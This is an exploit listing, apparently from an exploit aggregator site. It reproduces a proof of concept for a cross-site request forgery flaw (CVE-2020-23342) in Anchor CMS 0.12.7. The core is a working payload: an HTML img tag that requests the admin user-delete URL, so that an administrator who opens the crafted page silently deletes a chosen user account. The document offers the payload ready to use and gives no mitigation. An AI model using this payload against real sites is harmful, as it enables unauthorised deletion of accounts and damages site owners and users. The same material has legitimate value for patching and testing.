Exploit for Anchor CMS 0.12.7 Cross Site Request Forgery CVE-2020-23342

Name: Exploit for Anchor CMS 0.12.7 Cross Site Request Forgery CVE-2020-23342
Rating: 5 (91 reviews)

2021-01-21 | CVSS 0.7

## https://sploitus.com/exploit?id=PACKETSTORM:161048
# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)  
# Exploit Author: Ninad Mishra  
# Vendor Homepage: https://anchorcms.com/  
# Software Link: https://anchorcms.com/download  
# Version: 0.12.7  
# CVE : CVE-2020-23342  
  
  
###PoC  
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html  
  
================================   
<img src="http://target/anchor/index.php/admin/users/delete/21">  
================================   
Where (21) is the user id .  
  
When admin clicks on exploit.html link  
  
User with id 21 will be deleted